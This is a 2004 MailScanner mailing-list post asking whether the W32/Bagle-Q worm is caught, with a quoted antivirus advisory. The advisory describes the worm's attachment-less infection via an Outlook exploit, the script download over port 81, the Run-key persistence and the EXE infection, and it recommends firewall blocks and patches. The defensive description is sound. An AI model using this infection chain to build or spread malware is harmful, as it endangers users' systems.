Will MailScanner pickup the W32/Bagle-Q virus?

Plant, Dean dean.plant at ROKE.CO.UK
Thu Mar 18 10:32:48 GMT 2004


As this virus does not have an attachment can some one confirm if it will be stopped by MailScanner.

Thanks

Dean.

W32/Bagle-Q is a mass-mailing virus. This virus spreads in an unusual manner, so please read the information below carefully.

W32/Bagle-Q spreads via a "carrier" email which does not contain the worm as an attachment.

When you open a "carrier" email, the email attempts to exploit a vulnerability in Outlook which automatically downloads W32/Bagle-Q from the PC which sent you the "carrier" email. The security vulnerability was reportedly patched by Microsoft in Microsoft Security Bulletin MS03-040.

The "carrier" email downloads and launches a Visual Basic script. This script downloads W32/Bagle-Q via an HTTP (web) request to TCP port 81 on the sender's PC.

The downloaded copy of W32/Bagle-Q is placed into your system folder with the name directs.exe

W32/Bagle-Q loads on your PC and terminates a wide range of security applications

A registry entry is added to the key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run so that the program directs.exe loads every time you logon to your computer.

W32/Bagle-Q makes multiple copies of itself into folders which are likely to be part of a file-sharing network.

W32/Bagle-Q infects programs on your PC by appending itself to existing EXE files (this is called "parasitic virus infection").
The danger of W32/Bagle-Q can be mitigated not only by updating Sophos Anti-Virus but by blocking connections to TCP port 81 through your network firewall. (This port is unlikely to be required for any real services.)

Blocking outbound port 81 connections stops computers on your network from downloading the worm from outside. Blocking port 81 inbound means that even if you do get infected you will not pass the virus on to others.

You should also apply the latest Internet Explorer/Outlook Express patches from Microsoft. The vulnerability used by W32/Bagle-Q is described in the Microsoft Security Bulletin MS03-040 and is referred to as the "Object Tag vulnerability in Popup Window".

--

Visit our website at www.roke.co.uk

Registered Office: Roke Manor Research Ltd, Siemens House, Oldbury, Bracknell,
Berkshire. RG12 8FZ

The information contained in this e-mail and any attachments is confidential to
Roke Manor Research Ltd and must not be passed to any third party without
permission. This communication is for information only and shall not create or
change any contractual relationship.



More information about the MailScanner mailing list